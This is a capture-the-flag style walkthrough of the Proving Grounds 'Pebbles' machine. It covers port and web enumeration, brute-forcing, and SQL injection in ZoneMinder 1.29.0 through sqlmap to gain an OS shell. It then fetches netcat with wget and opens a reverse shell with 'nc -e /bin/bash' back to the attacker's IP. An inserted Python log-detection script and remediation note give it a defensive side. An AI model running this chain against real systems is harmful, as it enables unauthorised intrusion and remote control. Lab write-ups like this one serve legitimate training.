OSCP Proving Grounds Walkthrough: Pebbles

Aleksa Zatezalo
Offensive Security Library
3 min read · Aug 30, 2023

Pebbles is a vulnerable machine on Offensive Security's Proving Grounds. It is categorized as a "Warm Up" level machine with a community rating of hard. Here we will walk you through the solution of the VM.

Enumeration

As with every pen test, we start by running a basic nmap scan of Pebbles with the following command:

> nmap -sV -sC -p- -O 192.168.168.52

We discover that it is a Linux system running FTP (port 21), SSH (port 22), and Apache (on ports 80, 3305, and 8080). Because none of the detected service versions match any known exploits, we start by attempting to brute-force FTP with the following command:

hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.168.52 ftp

No valid logins are found. In parallel, we can also enumerate every port running Apache with gobuster and nikto.

Enumeration with Nikto:

nikto -h http://192.168.168.52/
nikto -h http://192.168.168.52:3305/
nikto -h http://192.168.168.52:8080/

Gobuster:

gobuster dir -u http://192.168.168.52/ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://192.168.168.52:3305/ -w /usr/share/wordlists/dirb/big.txt
gobuster dir -u http://192.168.168.52:8080/ -w /usr/share/wordlists/dirb/big.txt

The gobuster scan on port 8080 was the first to finish and yielded some interesting results, shown below.

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.168.52:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/08/30 15:32:53 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 281]
/.htpasswd (Status: 403) [Size: 281]
/WEB-INF (Status: 301) [Size: 325] [--> http://192.168.168.52:8080/WEB-INF/]
/cgi-bin/ (Status: 403) [Size: 281]
/favicon.ico (Status: 200) [Size: 21630]
/javascript (Status: 301) [Size: 328] [--> http://192.168.168.52:8080/javascript/]
/server-status (Status: 403) [Size: 281]
/zm (Status: 301) [Size: 320] [--> http://192.168.168.52:8080/zm/]

===============================================================
2023/08/30 15:33:59 Finished
===============================================================

Visiting the URL http://192.168.168.52:3305/zm showed that the target was running ZoneMinder v1.29.0.

ZoneMinder v1.29.0

An initial Google search shows that this version is affected by many CVEs. Running the following command in a terminal copies (searchsploit's -m mirrors the entry into the current directory) an interesting Exploit-DB text file that describes how to exploit it:

> searchsploit -m 41239.txt

Initial Access

ZoneMinder v1.29.0 was found to be vulnerable to SQL injection via the endpoint /zm/index.php. After some experimentation I found this command, which yields a web shell:

> sqlmap http://192.168.168.52:8080/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shell
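A detection-side counterpart to the request above, added here as an example that is not part of the original walkthrough and not ZoneMinder's own code: it inspects constructed access-log records, written as JSON lines that include the POST body (an assumed logging format, since Apache's default combined log does not record request bodies), and flags log-query requests to /zm/index.php whose parameters carry SQL metacharacters, as well as requests sent with a sqlmap User-Agent. The record layout and the sample values are constructed for the example.

```python
import json
import re
from urllib.parse import parse_qs

# Constructed sample records (hypothetical JSON-lines format from a reverse proxy
# that logs request bodies). Line 1 is the plain request from the walkthrough,
# lines 2 and 4 carry injection-style values, line 3 is ordinary console traffic.
SAMPLE_LOG = """\
{"ip":"192.168.45.247","method":"POST","path":"/zm/index.php","body":"view=request&request=log&task=query&limit=100&minTime=5","ua":"Mozilla/5.0"}
{"ip":"192.168.45.247","method":"POST","path":"/zm/index.php","body":"view=request&request=log&task=query&limit=100&minTime=5' AND SLEEP(5)-- -","ua":"sqlmap/1.7"}
{"ip":"10.0.0.5","method":"GET","path":"/zm/index.php","body":"view=console","ua":"Mozilla/5.0"}
{"ip":"192.168.45.247","method":"POST","path":"/zm/index.php","body":"view=request&request=log&task=query&limit=100 UNION SELECT 1,2,3&minTime=5","ua":"Mozilla/5.0"}
"""

# Heuristic: quote characters, SQL comment openers and common injection keywords.
SQLI_PATTERN = re.compile(
    r"(?i)('|\"|--|/\*|\bunion\b|\bselect\b|\bsleep\s*\(|\bbenchmark\s*\(|\bor\b\s+\d+\s*=\s*\d+)"
)
# Default sqlmap User-Agent contains the tool name (it can be randomised, so this is a weak signal).
SCANNER_UA = re.compile(r"(?i)\bsqlmap\b")


def inspect_record(rec):
    """Return a list of findings for one parsed log record (empty when clean)."""
    findings = []
    params = parse_qs(rec.get("body", ""), keep_blank_values=True)
    # Only the log-query request shape used in the walkthrough is inspected here.
    is_log_query = (
        rec.get("path") == "/zm/index.php"
        and params.get("request") == ["log"]
        and params.get("task") == ["query"]
    )
    if is_log_query:
        for name, values in params.items():
            for value in values:
                if SQLI_PATTERN.search(value):
                    findings.append(f"sqli-like value in log-query parameter {name!r}: {value!r}")
    if SCANNER_UA.search(rec.get("ua", "")):
        findings.append(f"scanner user-agent: {rec['ua']!r}")
    return findings


def scan_log(text):
    """Parse JSON-lines log text and return one alert per record with findings."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        findings = inspect_record(rec)
        if findings:
            alerts.append({"line": lineno, "ip": rec.get("ip"), "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The User-Agent check alone is not a reliable control, because sqlmap can randomise its agent string (--random-agent); inspecting the parameter values of the specific request shape is what catches lines 2 and 4 here, and the durable fix on the application side is parameterised queries or an upgrade past the affected ZoneMinder version.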

This yields a shell. However, it is painfully slow, and we can get a fully interactive and fast shell by transferring netcat to the target machine and having it connect back to a port on which we are listening. We start by getting our own IP address and starting a simple HTTP server in a directory containing the nc (netcat) binary.

Getting Our IP:

> ifconfig tun0
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 192.168.45.247 netmask 255.255.255.0 destination 192.168.45.247
inet6 fe80::f8da:433d:b46a:d452 prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 227964 bytes 90224062 (86.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 374841 bytes 41861061 (39.9 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

Getting nc:

> cp $(which nc) .
> ls
nc

Running a server:

> python3 -m http.server 80

Starting a listener:

> nc -nlvp 3305

On the victim machine we will run the following commands:

os-shell> wget "http://192.168.45.247/nc" -O /tmp/nc
os-shell> chmod +x /tmp/nc
os-shell> /tmp/nc -e /bin/bash 192.168.45.247 3305

There you have it. We have a root shell on the target, caught on our attacking machine. No need to priv-esc.
